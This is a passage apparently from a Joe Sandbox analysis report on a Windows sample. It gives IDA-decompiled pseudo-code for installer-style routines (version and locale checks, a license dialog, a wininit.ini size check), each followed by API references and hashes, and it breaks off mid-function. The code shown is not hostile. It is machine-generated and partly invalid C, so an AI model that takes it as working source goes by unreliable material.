                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E121D67DA00219ABDB10DFA4DC459FF7B78FBCA714B000219F902A7241DB769D068BE1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E00A4681F(void* __ebx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                                            				struct _OSVERSIONINFOA _v168;
                                                                                                                                                                                                                                            				void* _v172;
                                                                                                                                                                                                                                            				int* _v176;
                                                                                                                                                                                                                                            				int _v180;
                                                                                                                                                                                                                                            				int _v184;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t19;
                                                                                                                                                                                                                                            				long _t31;
                                                                                                                                                                                                                                            				signed int _t35;
                                                                                                                                                                                                                                            				void* _t36;
                                                                                                                                                                                                                                            				intOrPtr _t41;
                                                                                                                                                                                                                                            				signed int _t44;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t36 = __ebx;
                                                                                                                                                                                                                                            				_t19 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            				_v8 = _t19 ^ _t44;
                                                                                                                                                                                                                                            				_t41 =  *0xa481d8; // 0x0
                                                                                                                                                                                                                                            				_t43 = 0;
                                                                                                                                                                                                                                            				_v180 = 0xc;
                                                                                                                                                                                                                                            				_v176 = 0;
                                                                                                                                                                                                                                            				if(_t41 == 0xfffffffe) {
                                                                                                                                                                                                                                            					 *0xa481d8 = 0;
                                                                                                                                                                                                                                            					_v168.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                                                            					if(GetVersionExA( &_v168) == 0) {
                                                                                                                                                                                                                                            						L12:
                                                                                                                                                                                                                                            						_t41 =  *0xa481d8; // 0x0
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t41 = 1;
                                                                                                                                                                                                                                            						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                                                                                                                                                                                            							goto L12;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t31 = RegQueryValueExA(_v172, 0xa41140, 0,  &_v184,  &_v20,  &_v180);
                                                                                                                                                                                                                                            							_t43 = _t31;
                                                                                                                                                                                                                                            							RegCloseKey(_v172);
                                                                                                                                                                                                                                            							if(_t31 != 0) {
                                                                                                                                                                                                                                            								goto L12;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t40 =  &_v176;
                                                                                                                                                                                                                                            								if(E00A466F9( &_v20,  &_v176) == 0) {
                                                                                                                                                                                                                                            									goto L12;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t35 = _v176 & 0x000003ff;
                                                                                                                                                                                                                                            									if(_t35 == 1 || _t35 == 0xd) {
                                                                                                                                                                                                                                            										 *0xa481d8 = _t41;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										goto L12;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A46CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                                                                                                                                                                                                                                            			}



















APIs
• GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00A4686E
• GetSystemMetrics.USER32(0000004A), ref: 00A468A7
• RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00A468CC
• RegQueryValueExA.ADVAPI32(?,00A41140,00000000,?,?,0000000C), ref: 00A468F4
• RegCloseKey.ADVAPI32(?), ref: 00A46902
  • Part of subcall function 00A466F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,00A4691A), ref: 00A46741
Strings
• Control Panel\Desktop\ResourceLocale, xrefs: 00A468C2
Memory Dump Source
• Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
• Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
Similarity
• API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
• String ID: Control Panel\Desktop\ResourceLocale
• API String ID: 3346862599-1109908249
• Opcode ID: 5e2cb387b6ff3c3851acaebf0d00a5cbcd564c25ef823f936802f3f949bab386
• Instruction ID: a4ac2f7c45c9e4ced935420cb5c58d6e4a0abf3f5e72d9261f31560e166f0cc1
• Opcode Fuzzy Hash: 5e2cb387b6ff3c3851acaebf0d00a5cbcd564c25ef823f936802f3f949bab386
• Instruction Fuzzy Hash: BD31823DA002189FDB31CF55DC44BAAB7B8EBCB714F000195E949A2241DB719D868F53
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A43A3F(void* __eflags) {
                                                                                                                                                                                                                                            				void* _t3;
                                                                                                                                                                                                                                            				void* _t9;
                                                                                                                                                                                                                                            				CHAR* _t16;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t16 = "LICENSE";
                                                                                                                                                                                                                                            				_t1 = E00A4468F(_t16, 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                            				_t3 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                                                            				 *0xa48d4c = _t3;
                                                                                                                                                                                                                                            				if(_t3 != 0) {
                                                                                                                                                                                                                                            					_t19 = _t16;
                                                                                                                                                                                                                                            					if(E00A4468F(_t16, _t3, _t28) != 0) {
                                                                                                                                                                                                                                            						if(lstrcmpA( *0xa48d4c, "<None>") == 0) {
                                                                                                                                                                                                                                            							LocalFree( *0xa48d4c);
                                                                                                                                                                                                                                            							L9:
                                                                                                                                                                                                                                            							 *0xa49124 = 0;
                                                                                                                                                                                                                                            							return 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t9 = E00A46517(_t19, 0x7d1, 0, E00A43100, 0, 0);
                                                                                                                                                                                                                                            						LocalFree( *0xa48d4c);
                                                                                                                                                                                                                                            						if(_t9 != 0) {
                                                                                                                                                                                                                                            							goto L9;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *0xa49124 = 0x800704c7;
                                                                                                                                                                                                                                            						L2:
                                                                                                                                                                                                                                            						return 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					E00A444B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					LocalFree( *0xa48d4c);
                                                                                                                                                                                                                                            					 *0xa49124 = 0x80070714;
                                                                                                                                                                                                                                            					goto L2;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				E00A444B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            				 *0xa49124 = E00A46285();
                                                                                                                                                                                                                                            				goto L2;
                                                                                                                                                                                                                                            			}







                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A446A0
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: SizeofResource.KERNEL32(00000000,00000000,?,00A42D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446A9
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A446C3
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: LoadResource.KERNEL32(00000000,00000000,?,00A42D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446CC
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: LockResource.KERNEL32(00000000,?,00A42D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446D3
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: memcpy_s.MSVCRT ref: 00A446E5
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446EF
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00A42F64,?,00000002,00000000), ref: 00A43A5D
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00A43AB3
                                                                                                                                                                                                                                              • Part of subcall function 00A444B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A44518
                                                                                                                                                                                                                                              • Part of subcall function 00A444B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00A44554
                                                                                                                                                                                                                                              • Part of subcall function 00A46285: GetLastError.KERNEL32(00A45BBC), ref: 00A46285
                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(<None>,00000000), ref: 00A43AD0
                                                                                                                                                                                                                                            • LocalFree.KERNEL32 ref: 00A43B13
                                                                                                                                                                                                                                              • Part of subcall function 00A46517: FindResourceA.KERNEL32(00A40000,000007D6,00000005), ref: 00A4652A
                                                                                                                                                                                                                                              • Part of subcall function 00A46517: LoadResource.KERNEL32(00A40000,00000000,?,?,00A42EE8,00000000,00A419E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00A46538
                                                                                                                                                                                                                                              • Part of subcall function 00A46517: DialogBoxIndirectParamA.USER32(00A40000,00000000,00000547,00A419E0,00000000), ref: 00A46557
                                                                                                                                                                                                                                              • Part of subcall function 00A46517: FreeResource.KERNEL32(00000000,?,?,00A42EE8,00000000,00A419E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00A46560
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00A43100,00000000,00000000), ref: 00A43AF4
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                                                            • String ID: <None>$LICENSE
                                                                                                                                                                                                                                            • API String ID: 2414642746-383193767
                                                                                                                                                                                                                                            • Opcode ID: 5ffaef4423d100e5d2c1543f214366565aa61ab4a952633af04bf3ea6fecfe3c
                                                                                                                                                                                                                                            • Instruction ID: d40fd9e5d338e17c9e09d24636bd7c5ea41596e87f2da89a6a0316071ef77a07
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5ffaef4423d100e5d2c1543f214366565aa61ab4a952633af04bf3ea6fecfe3c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7E112C3D741201ABDB24DFB6AD09F1B39B9DBDBB40B10463EB541E51A1DBBF88028620
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E00A424E0(void* __ebx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t7;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				long _t26;
                                                                                                                                                                                                                                            				signed int _t27;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t20 = __ebx;
                                                                                                                                                                                                                                            				_t7 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            				_v8 = _t7 ^ _t27;
                                                                                                                                                                                                                                            				_t25 = 0x104;
                                                                                                                                                                                                                                            				_t26 = 0;
                                                                                                                                                                                                                                            				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                            					E00A4658A( &_v268, 0x104, "wininit.ini");
                                                                                                                                                                                                                                            					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                                                                                                                                                                                            					_t25 = _lopen( &_v268, 0x40);
                                                                                                                                                                                                                                            					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                            						_t26 = _llseek(_t25, 0, 2);
                                                                                                                                                                                                                                            						_lclose(_t25);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A46CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00A42506
                                                                                                                                                                                                                                            • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 00A4252C
                                                                                                                                                                                                                                            • _lopen.KERNEL32 ref: 00A4253B
                                                                                                                                                                                                                                            • _llseek.KERNEL32(00000000,00000000,00000002), ref: 00A4254C
                                                                                                                                                                                                                                            • _lclose.KERNEL32(00000000), ref: 00A42555
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                                                            • String ID: wininit.ini
                                                                                                                                                                                                                                            • API String ID: 3273605193-4206010578
                                                                                                                                                                                                                                            • Opcode ID: 82867233c1d40db288942449cebd003dc390bf5550de094cacd1dc3b11497a43
                                                                                                                                                                                                                                            • Instruction ID: 6b80a3d3094dd1de7cc5d96f2d3f1600ce6c42f97ad35353ea9c815f8b90a171
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 82867233c1d40db288942449cebd003dc390bf5550de094cacd1dc3b11497a43
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E01923E600118A7D720DBA59C08EDF7B7CEBD6750F000165FA49D3190DA758E868A92
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                                                                            			E00A436EE(CHAR* __ecx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				struct _OSVERSIONINFOA _v416;
                                                                                                                                                                                                                                            				signed int _v420;
                                                                                                                                                                                                                                            				signed int _v424;
                                                                                                                                                                                                                                            				CHAR* _v428;
                                                                                                                                                                                                                                            				CHAR* _v432;
                                                                                                                                                                                                                                            				signed int _v436;
                                                                                                                                                                                                                                            				CHAR* _v440;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t72;
                                                                                                                                                                                                                                            				CHAR* _t77;
                                                                                                                                                                                                                                            				CHAR* _t91;
                                                                                                                                                                                                                                            				CHAR* _t94;
                                                                                                                                                                                                                                            				int _t97;
                                                                                                                                                                                                                                            				CHAR* _t98;
                                                                                                                                                                                                                                            				signed char _t99;
                                                                                                                                                                                                                                            				CHAR* _t104;
                                                                                                                                                                                                                                            				signed short _t107;
                                                                                                                                                                                                                                            				signed int _t109;
                                                                                                                                                                                                                                            				short _t113;
                                                                                                                                                                                                                                            				void* _t114;
                                                                                                                                                                                                                                            				signed char _t115;
                                                                                                                                                                                                                                            				short _t119;
                                                                                                                                                                                                                                            				CHAR* _t123;
                                                                                                                                                                                                                                            				CHAR* _t124;
                                                                                                                                                                                                                                            				CHAR* _t129;
                                                                                                                                                                                                                                            				signed int _t131;
                                                                                                                                                                                                                                            				signed int _t132;
                                                                                                                                                                                                                                            				CHAR* _t135;
                                                                                                                                                                                                                                            				CHAR* _t138;
                                                                                                                                                                                                                                            				signed int _t139;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t72 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            				_v8 = _t72 ^ _t139;
                                                                                                                                                                                                                                            				_v416.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                                                            				_t115 = __ecx;
                                                                                                                                                                                                                                            				_t135 = 0;
                                                                                                                                                                                                                                            				_v432 = __ecx;
                                                                                                                                                                                                                                            				_t138 = 0;
                                                                                                                                                                                                                                            				if(GetVersionExA( &_v416) != 0) {
                                                                                                                                                                                                                                            					_t133 = _v416.dwMajorVersion;
                                                                                                                                                                                                                                            					_t119 = 2;
                                                                                                                                                                                                                                            					_t77 = _v416.dwPlatformId - 1;
                                                                                                                                                                                                                                            					__eflags = _t77;
                                                                                                                                                                                                                                            					if(_t77 == 0) {
                                                                                                                                                                                                                                            						_t119 = 0;
                                                                                                                                                                                                                                            						__eflags = 1;
                                                                                                                                                                                                                                            						 *0xa48184 = 1;
                                                                                                                                                                                                                                            						 *0xa48180 = 1;
                                                                                                                                                                                                                                            						L13:
                                                                                                                                                                                                                                            						 *0xa49a40 = _t119;
                                                                                                                                                                                                                                            						L14:
                                                                                                                                                                                                                                            						__eflags =  *0xa48a34 - _t138; // 0x0
                                                                                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                                                                                            							goto L66;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__eflags = _t115;
                                                                                                                                                                                                                                            						if(_t115 == 0) {
                                                                                                                                                                                                                                            							goto L66;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_v428 = _t135;
                                                                                                                                                                                                                                            						__eflags = _t119;
                                                                                                                                                                                                                                            						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                                                                                                                                                                                            						_t11 =  &_v420;
                                                                                                                                                                                                                                            						 *_t11 = _v420 & _t138;
                                                                                                                                                                                                                                            						__eflags =  *_t11;
                                                                                                                                                                                                                                            						_v440 = _t115;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_v424 = _t135 * 0x18;
                                                                                                                                                                                                                                            							_v436 = E00A42A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                                                                                                                                                                                            							_t91 = E00A42A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                                                                                                                                                                                            							_t123 = _v436;
                                                                                                                                                                                                                                            							_t133 = 0x54d;
                                                                                                                                                                                                                                            							__eflags = _t123;
                                                                                                                                                                                                                                            							if(_t123 < 0) {
                                                                                                                                                                                                                                            								L32:
                                                                                                                                                                                                                                            								__eflags = _v420 - 1;
                                                                                                                                                                                                                                            								if(_v420 == 1) {
                                                                                                                                                                                                                                            									_t138 = 0x54c;
                                                                                                                                                                                                                                            									L36:
                                                                                                                                                                                                                                            									__eflags = _t138;
                                                                                                                                                                                                                                            									if(_t138 != 0) {
                                                                                                                                                                                                                                            										L40:
                                                                                                                                                                                                                                            										__eflags = _t138 - _t133;
                                                                                                                                                                                                                                            										if(_t138 == _t133) {
                                                                                                                                                                                                                                            											L30:
                                                                                                                                                                                                                                            											_v420 = _v420 & 0x00000000;
                                                                                                                                                                                                                                            											_t115 = 0;
                                                                                                                                                                                                                                            											_v436 = _v436 & 0x00000000;
                                                                                                                                                                                                                                            											__eflags = _t138 - _t133;
                                                                                                                                                                                                                                            											_t133 = _v432;
                                                                                                                                                                                                                                            											if(__eflags != 0) {
                                                                                                                                                                                                                                            												_t124 = _v440;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                                                                                                                                                                                                            												_v420 =  &_v268;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags = _t124;
                                                                                                                                                                                                                                            											if(_t124 == 0) {
                                                                                                                                                                                                                                            												_t135 = _v436;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												_t99 = _t124[0x30];
                                                                                                                                                                                                                                            												_t135 = _t124[0x34] + 0x84 + _t133;
                                                                                                                                                                                                                                            												__eflags = _t99 & 0x00000001;
                                                                                                                                                                                                                                            												if((_t99 & 0x00000001) == 0) {
                                                                                                                                                                                                                                            													asm("sbb ebx, ebx");
                                                                                                                                                                                                                                            													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													_t115 = 0x104;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags =  *0xa48a38 & 0x00000001;
                                                                                                                                                                                                                                            											if(( *0xa48a38 & 0x00000001) != 0) {
                                                                                                                                                                                                                                            												L64:
                                                                                                                                                                                                                                            												_push(0);
                                                                                                                                                                                                                                            												_push(0x30);
                                                                                                                                                                                                                                            												_push(_v420);
                                                                                                                                                                                                                                            												_push("cent");
                                                                                                                                                                                                                                            												goto L65;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												__eflags = _t135;
                                                                                                                                                                                                                                            												if(_t135 == 0) {
                                                                                                                                                                                                                                            													goto L64;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												__eflags =  *_t135;
                                                                                                                                                                                                                                            												if( *_t135 == 0) {
                                                                                                                                                                                                                                            													goto L64;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												MessageBeep(0);
                                                                                                                                                                                                                                            												_t94 = E00A4681F(_t115);
                                                                                                                                                                                                                                            												__eflags = _t94;
                                                                                                                                                                                                                                            												if(_t94 == 0) {
                                                                                                                                                                                                                                            													L57:
                                                                                                                                                                                                                                            													0x180030 = 0x30;
                                                                                                                                                                                                                                            													L58:
                                                                                                                                                                                                                                            													_t97 = MessageBoxA(0, _t135, "cent", 0x00180030 | _t115);
                                                                                                                                                                                                                                            													__eflags = _t115 & 0x00000004;
                                                                                                                                                                                                                                            													if((_t115 & 0x00000004) == 0) {
                                                                                                                                                                                                                                            														__eflags = _t115 & 0x00000001;
                                                                                                                                                                                                                                            														if((_t115 & 0x00000001) == 0) {
                                                                                                                                                                                                                                            															goto L66;
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            														__eflags = _t97 - 1;
                                                                                                                                                                                                                                            														L62:
                                                                                                                                                                                                                                            														if(__eflags == 0) {
                                                                                                                                                                                                                                            															_t138 = 0;
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            														goto L66;
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            													__eflags = _t97 - 6;
                                                                                                                                                                                                                                            													goto L62;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												_t98 = E00A467C9(_t124, _t124);
                                                                                                                                                                                                                                            												__eflags = _t98;
                                                                                                                                                                                                                                            												if(_t98 == 0) {
                                                                                                                                                                                                                                            													goto L57;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												goto L58;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										__eflags = _t138 - 0x54c;
                                                                                                                                                                                                                                            										if(_t138 == 0x54c) {
                                                                                                                                                                                                                                            											goto L30;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										__eflags = _t138;
                                                                                                                                                                                                                                            										if(_t138 == 0) {
                                                                                                                                                                                                                                            											goto L66;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_t135 = 0;
                                                                                                                                                                                                                                            										__eflags = 0;
                                                                                                                                                                                                                                            										goto L44;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									L37:
                                                                                                                                                                                                                                            									_t129 = _v432;
                                                                                                                                                                                                                                            									__eflags = _t129[0x7c];
                                                                                                                                                                                                                                            									if(_t129[0x7c] == 0) {
                                                                                                                                                                                                                                            										goto L66;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t133 =  &_v268;
                                                                                                                                                                                                                                            									_t104 = E00A428E8(_t129,  &_v268, _t129,  &_v428);
                                                                                                                                                                                                                                            									__eflags = _t104;
                                                                                                                                                                                                                                            									if(_t104 != 0) {
                                                                                                                                                                                                                                            										goto L66;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t135 = _v428;
                                                                                                                                                                                                                                            									_t133 = 0x54d;
                                                                                                                                                                                                                                            									_t138 = 0x54d;
                                                                                                                                                                                                                                            									goto L40;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								goto L33;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags = _t91;
                                                                                                                                                                                                                                            							if(_t91 > 0) {
                                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags = _t123;
                                                                                                                                                                                                                                            							if(_t123 != 0) {
                                                                                                                                                                                                                                            								__eflags = _t91;
                                                                                                                                                                                                                                            								if(_t91 != 0) {
                                                                                                                                                                                                                                            									goto L37;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                                                                                                                                                                                            								L27:
                                                                                                                                                                                                                                            								if(__eflags <= 0) {
                                                                                                                                                                                                                                            									goto L37;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								L28:
                                                                                                                                                                                                                                            								__eflags = _t135;
                                                                                                                                                                                                                                            								if(_t135 == 0) {
                                                                                                                                                                                                                                            									goto L33;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t138 = 0x54c;
                                                                                                                                                                                                                                            								goto L30;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags = _t91;
                                                                                                                                                                                                                                            							_t107 = _v416.dwBuildNumber;
                                                                                                                                                                                                                                            							if(_t91 != 0) {
                                                                                                                                                                                                                                            								_t131 = _v424;
                                                                                                                                                                                                                                            								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                                                                                                                                                                                            								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                                                                                                                                                                                            									goto L37;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								goto L28;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t132 = _t107 & 0x0000ffff;
                                                                                                                                                                                                                                            							_t109 = _v424;
                                                                                                                                                                                                                                            							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                                                                                                                                                                                            							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                                                                                                                                                                                            								goto L28;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                                                                                                                                                                                            							goto L27;
                                                                                                                                                                                                                                            							L33:
                                                                                                                                                                                                                                            							_t135 =  &(_t135[1]);
                                                                                                                                                                                                                                            							_v428 = _t135;
                                                                                                                                                                                                                                            							_v420 = _t135;
                                                                                                                                                                                                                                            							__eflags = _t135 - 2;
                                                                                                                                                                                                                                            						} while (_t135 < 2);
                                                                                                                                                                                                                                            						goto L36;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__eflags = _t77 == 1;
